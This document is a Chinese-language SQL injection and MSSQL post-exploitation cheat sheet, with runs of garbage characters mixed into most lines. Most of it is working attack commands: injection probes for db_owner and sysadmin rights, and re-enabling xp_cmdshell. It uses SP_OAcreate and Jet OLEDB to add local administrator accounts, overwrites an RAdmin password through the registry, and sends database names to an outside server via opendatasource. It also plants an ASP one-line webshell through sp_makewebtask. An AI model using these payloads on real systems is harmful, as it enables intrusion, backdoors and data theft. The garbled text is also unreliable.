//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))! E% V$ B' U# }/ V6 J0 B! V
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--( u. y* J+ g: s8 J% Z+ J
" S- G' a# X3 ?& T6 b//检测是否有读取某数据库的权限
$ e" Z8 @ A8 i' Rand 1= (Select HAS_DBACCESS('master'))
. q2 u0 S* K$ |$ f7 dAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
8 W$ ?$ B1 P. f2 N u$ R
8 u6 ^' K% o# G6 N# q9 ^0 o/ O* Z$ | y, K3 _* f- ^
数字类型
7 f" e9 X' I6 V: d- ^; } }and char(124)%2Buser%2Bchar(124)=0
. l' Y$ I* F( e8 g
字符类型
: ]2 t1 {- T1 B# d1 n1 |5 l' and char(124)%2Buser%2Bchar(124)=0 and ''='3 h6 c {* Q4 G6 c; ^7 b
' m& }' p3 n2 g
搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='5 [; G4 N5 w# |6 ~4 G F
爆用户名
$ _4 M6 t( D- d3 h/ T, p$ qand user>0
7 c: Q3 A n6 ]5 e+ S. n' and user>0 and ''='
8 `+ G F' R5 T9 @( r+ X
检测是否为SA权限
5 c' Z. N. C. ^6 @6 v. B& xand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
' U4 V6 F: t, M- L/ M' ~# RAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
. u' ]( _; n2 ^- v9 |6 L+ l. b
检测是不是MSSQL数据库
7 O: E! x* q( @" D# ~" ^$ Oand exists (select * from sysobjects);--$ _) ~: m) h/ {% G9 N
& R: |1 w" S' {* V3 ^: e" T0 U
检测是否支持多行
4 X" h2 ~' n+ a;declare @d int;--" {# _9 k, W4 ~3 O
恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
1 t( f5 d5 w) m2 G" U* I9 O' }# V
# c3 B- C" ?& ^1 ~
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
, {0 F" ^9 t5 D4 H m% `' E2 b9 t$ a. i7 X% t: @ l
//-----------------------
// 执行命令
//-----------------------
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
- n, f5 d( K% f; M$ q) |* h" r" ]2 v9 B6 o! @( Y$ x' [, E
然后利用jet.oledb执行系统命令
& L4 l4 a. E ?8 B& J, A7 [$ \select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
) J+ ^ k8 c& J) X8 i; S- e" l5 n8 o4 M$ t' Q7 E4 N
执行命令
) K: H% b$ e: e: @/ z! F4 x;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
* j* _+ X; x% p. k; P
! W: |" p; P, j- e; x# p l; P5 DEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111': c% [+ r! N' T0 b% i! E$ O; l% p
! y* E4 E, V: c
判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')6 n! x+ d# B) G
; O5 p1 J4 W+ T |
写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
# [2 ^+ y, r9 c1 a" j% e8 o8 B% n
REG_SZ
# k# D; N# L p
读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'. Q+ G4 f5 A6 \+ ^3 g$ r
读取目录内容
6 J* p. z7 b% G: s! `5 M9 zexec master..xp_dirtree 'c:\winnt\system32\',1,17 o6 Q, \ w' t5 s* Z" w" E
5 h; l$ O2 I+ g/ ^! d) }7 H( B$ f" U( }. ]" [$ o4 K2 X
数据库备份
backup database pubs to disk = 'c:\123.bak'5 g& u1 R W$ R. I1 z4 w1 y& t
% h" w- x) @# A; s s9 c! G
//爆出长度
# e/ U6 v' B9 A6 kAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--8 q3 l) `: z# q1 C% C' a
$ {7 G6 \' p ]3 [! L
& k) C1 f9 ~; H* c
更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'
+ {9 L; d4 q% w) H" S- `3 @
添加和删除一个SA权限的用户test:
9 g1 a3 H' s* kexec master.dbo.sp_addlogin test,9530772. b9 Y0 T( R1 r# O4 \
exec master.dbo.sp_addsrvrolemember test,sysadmin H7 t# I2 ]. \1 q& k7 o( ~7 ?+ D
3 o( x6 @( X' |+ ^2 j
删除扩展存储过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell') B& _/ h \0 n
添加扩展存储过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'& h' B" \& P) f: \& w3 J
GRANT exec On xp_proxiedadata TO public
1 }/ |+ d/ A6 `$ y
9 n$ ]% t# h& M5 [' d3 Q/ ]. G$ t; \. r% v, H a, O- z& B& k
停掉或激活某个服务。
3 k9 B0 U& | Y% ~5 E
; _: |# a( d. G( u( m" Gexec master..xp_servicecontrol 'stop','schedule'4 @$ I. K2 [( g5 j
exec master..xp_servicecontrol 'start','schedule'
, P$ R3 V/ U r, R' p) S5 d+ v1 I# @8 W& s5 [( a# [
dbo.xp_subdirs
+ z+ W. J" b% z2 h7 G) C) |' e8 u, D
只列某个目录下的子目录。
4 `- u1 ? Q; U' d& J0 n- [xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp': M! l, A! n/ G5 o; p& ?
! v4 c" t( C2 `; E3 X
dbo.xp_makecab
将目标多个档案压缩到某个目标档案之内。
5 W1 U0 N* g2 p所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。% H9 q9 y7 u" w+ l: f
. S, D+ S# _+ Kdbo.xp_makecab
, R6 L- t6 \+ o# l! w'c:\test.cab','mszip',1,( @0 r2 B! Z6 W- g
'C:\Inetpub\wwwroot\SQLInject\login.asp',
7 d& _1 W+ K& G'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'# b# T5 M/ h3 `, q/ f' u s/ A7 U8 X
xp_terminate_process
5 U. H! P) ]. Z1 H4 F/ K2 o
停掉某个执行中的程序,但赋予的参数是 Process ID。
利用“工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
6 Z5 N3 B" ^' L3 K9 t' B
- B# [( w1 S0 X0 A1 _4 dxp_terminate_process 2484
: W T$ Q+ Z4 u9 O* F/ K, R( {. s6 I0 k, @, k
xp_unpackcab
8 N& H8 o4 V$ a3 I
解开压缩档。
& c. M, f5 b% M1 {1 x: C$ p8 t
xp_unpackcab 'c:\test.cab','c:\temp',1/ b0 {; b3 O$ n. a' C
7 ^8 }7 X+ Q+ Z5 |5 Y; \0 Q7 @" s
U! l2 F: d& x2 `
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12349 P* b! K, `- C! S) X* K1 }
5 \2 }/ \4 y: {) V8 U1 ~# screate database lcx;7 b4 Z9 I9 N. C# p+ e0 {. U9 P- m
Create TABLE ku(name nvarchar(256) null); o1 E- c, ?/ v
Create TABLE biao(id int NULL,name nvarchar(256) null);
% t' n2 U0 x; v8 l
//得到数据库名
9 K5 Q2 o1 I. g/ ^3 q* H0 Q( Finsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
& ~1 b) [2 L0 Z& T; l& C1 Y0 _0 S3 P! }7 u
# M5 i! X" r3 U) O# P
//在Master中创建表,看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
# @9 Q5 @" w. [+ D8 x) y# O7 Y# q7 L. l( x( T* _$ k5 z% T
用 sp_makewebtask直接在web目录里写入一句话马:* s b1 H) N! E; m1 S
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
8 b4 W/ w; h% a6 r( R; X* ]2 p, {7 x3 B9 Y& b6 K1 E3 i. A' j
//更新表内容
Update films SET kind = 'Dramatic' Where id = 1234 V$ L9 H+ c0 U3 J$ f
# J& \" M8 d# d+ q* u( R7 ~
//删除内容
" k4 W+ ?8 U% H3 t7 U5 p( l1 f- Pdelete from table_name where Stockid = 3 |